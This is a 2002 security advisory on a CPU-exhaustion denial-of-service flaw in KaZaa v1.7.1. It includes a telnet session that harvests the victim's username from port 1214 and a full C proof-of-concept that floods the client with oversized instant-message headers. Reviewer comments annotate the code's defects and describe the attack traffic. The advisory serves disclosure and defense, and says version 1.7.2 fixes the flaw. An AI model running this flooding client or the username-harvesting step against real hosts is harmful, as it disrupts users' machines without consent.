
KaZaa Denial of Service Attack FSC:
26th Jul 2002 [SBWID-5561]
COMMAND

	KaZaa Denial of Service Attack

SYSTEMS AFFECTED

	KaZaa v1.7.1

PROBLEM

	Josh [josh@pulltheplug.com] & omega  [mtwoar@hotmail.com]  with  the
	assistance of SooT :
	

	There exists a denial of service attack in the KaZaa Media Desktop file
	sharing utility that allows an attacker to force CPU usage to rise to
	100% by sending large messages to the victim. Basically it seems to
	have the same effect as opening an exceptionally large text file in
	some text editor. The added bonus is the decryption that is performed
	on the message, which adds to the CPU usage. Exploitation merely
	requires the I.P. of the victim and a username. The username does not
	have to be guessed: the client returns it in the X-Kazaa-Username
	header of its response to any HTTP request on port 1214, as in this
	session:
	

	$ telnet <ip> 1214

	Trying <ip>...

	Connected to <ip>.

	Escape character is '^]'.

	GET / HTTP/1.1                                 // My input

	

	HTTP/1.0 404 Not Found                         // Server output

	X-Kazaa-Username: <the user name of the user>

	X-Kazaa-Network: KaZaA

	X-Kazaa-IP: <the_ip_you_typed>:1214

	X-Kazaa-SupernodeIP: <censored>:1214

	

	Connection closed by foreign host.

	

	Assuming you and the receiving user have the bandwidth to  transmit  and
	receive the message before the connection to  the  user's  kazaa  server
	times out, a good  proof  of  concept  length  is  20  messages  at  100
	iterations of the 4026 byte message  tell...  300  iterations  20  times
	will make it pretty evident.
	

	/*

	   kazaa denial of service attack

	   by Josh and omega

	*/

	

	#include <stdio.h>

	#include <stdlib.h>

	#include <unistd.h>

	#include <errno.h>

	#include <string.h>

	#include <netdb.h>

	#include <sys/types.h>

	#include <netinet/in.h>

	#include <sys/socket.h>

	#include <stdarg.h>

	

	#define PORT 1214

	

	

	/*
	 * Proof-of-concept client for the KaZaa v1.7.1 large-message CPU
	 * exhaustion issue described in this advisory.
	 *
	 * Arguments, as printed by the usage string: argv[1] hostname,
	 * argv[2] count of 4026-byte chunks per message, argv[3] recipient
	 * username, argv[4] number of messages.
	 *
	 * What the code does: builds one HTTP-style request for "/.message"
	 * whose body is a series of "X-Kazaa-IMData:" header lines of about
	 * 4 KB each, then opens a new TCP connection to port 1214 for every
	 * message and writes the whole buffer.
	 *
	 * Defender's view: the traffic this produces is a "GET /.message"
	 * request on TCP/1214 carrying many oversized X-Kazaa-IMData headers,
	 * repeated over short-lived connections from one source.
	 *
	 * NOTE(review): the listing has several memory-safety and
	 * error-handling defects (uninitialized read, unbounded strcat,
	 * unchecked malloc/write, leaked descriptor); they are flagged inline.
	 */
	int main(int argc, char *argv[])

	{

	   /* numbytes and j are declared but never used in this function. */
	   int fd, numbytes, randnum, k;

	   struct hostent *host;

	   struct sockaddr_in them;

	   char buf2[4026];

	   char buf[5000];

	   char *bigboy;

	   int i, size, j;

	

	

	   /* Filler payload: 4025 'a' characters followed by the terminator. */
	   memset(buf2, 'a', sizeof(buf2));

	   buf2[sizeof(buf2)-1]='\0';

	   /*
	    * NOTE(review): the generator is seeded here but rand() is never
	    * called, and <time.h> is not among the includes shown above, so
	    * time() is used without a visible prototype.
	    */
	   srand(time(NULL));

	

	   if (argc < 5)

	   {

	      fprintf(stderr,"usage: %s <hostname> <(this*4026) bytes per message> <username_of_target> <number_of_messages>\n", argv[0]);

	      exit(1);

	   }

	   if ((host=gethostbyname(argv[1])) == NULL)

	   {

	      /*
	       * NOTE(review): gethostbyname() reports failures through h_errno,
	       * not errno, so perror() may print an unrelated message here.
	       */
	      perror("gethostbyname");

	      exit(1);

	   }

	

	   /* Destination: first resolved address, fixed port PORT (1214). */
	   them.sin_family = AF_INET;

	   them.sin_port = htons(PORT);

	   them.sin_addr = *((struct in_addr *)host->h_addr);

	   memset(&(them.sin_zero), '\0', 8);

	

	

	   /*
	    * 4042 = strlen("X-Kazaa-IMData: ") + 4025 filler bytes + '\n';
	    * 280 is a fixed allowance for the header text and 1 is the
	    * terminator.
	    * NOTE(review): atoi() gives no error indication, the multiplication
	    * can overflow int for large input, and the malloc() result is used
	    * without a NULL check.
	    */
	   size=(4042*atoi(argv[2]))+280+1;

	   bigboy=(char *)malloc(size);

	

	   /*
	    * NOTE(review): randnum is never assigned before being formatted
	    * with %d here; reading it is undefined behavior and the two
	    * address fields carry an indeterminate value.
	    */
	   snprintf(bigboy, size, "GET /.message HTTP/1.1\nHost: 68.10.112.148:1214\nUserAgent: KazaaClient Jan 18 2002 18:53:21\nX-Kazaa-Username: 31337h4x0r\nX-Kazaa-Network: KaZaA\nX-Kazaa-IP: %d:1214\nX-Kazaa-SupernodeIP: %d:1214\nConnection:  open\nX-Kazaa-IMTo: %s@KaZaA\nX-Kazaa-IMType: user_text\n", randnum, randnum, argv[3]);

	

	   /* the msg appears as one msg to the receiver, but comes in intervals of 4096 bytes... */

	   /* One IMData header line; bounded by sizeof(buf), 4042 bytes long. */
	   snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %s\n", buf2);

	   /*
	    * NOTE(review): k is incremented in the loop header and again in
	    * the body, so about half as many lines are appended as argv[2]
	    * requests. strcat() does no bounds checking, and nothing verifies
	    * that the header (which grows with argv[3]) plus the appended
	    * lines and the trailer fit in the `size` bytes allocated above.
	    */
	   for(k=0;k<atoi(argv[2]);k++)

	   {

	      strcat(bigboy, buf);

	      k++;

	   }

	   strcat(bigboy, "\r\n\r\n\r\n\r\n\r\n");

	

	   fprintf(stdout, "done preparing packet... sending\n");

	   /* i counts attempts; k is reused to count connections that succeeded. */
	   for(i=0, k=0;i<atoi(argv[4]);i++)

	   {

	     if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)

	     {

	       perror("socket");

	     }

	     else

	     {

	       if (connect(fd, (struct sockaddr *)&them,sizeof(struct sockaddr)) == -1)

	       {

	         /*
	          * NOTE(review): fd is not closed on this path, so each failed
	          * connect leaks one descriptor.
	          */
	         perror("connect");

	       }

	       else

	       {

	         printf("sending %d message\n", k);

	         /*
	          * NOTE(review): the return value of write() is ignored, so a
	          * short or failed write is still counted as delivered.
	          */
	         write(fd, bigboy, strlen(bigboy));

	         k++;

	         close(fd);

	       }

	     }

	   }

	   /* Reports successful connections (k) against attempts (i). */
	   fprintf(stdout, "\n%d out of %d attempted got through\n", k, i);

	   free(bigboy);

	   return 0;

	}

	

SOLUTION

	KaZaa v1.7.2 has been released and fixes the problem.
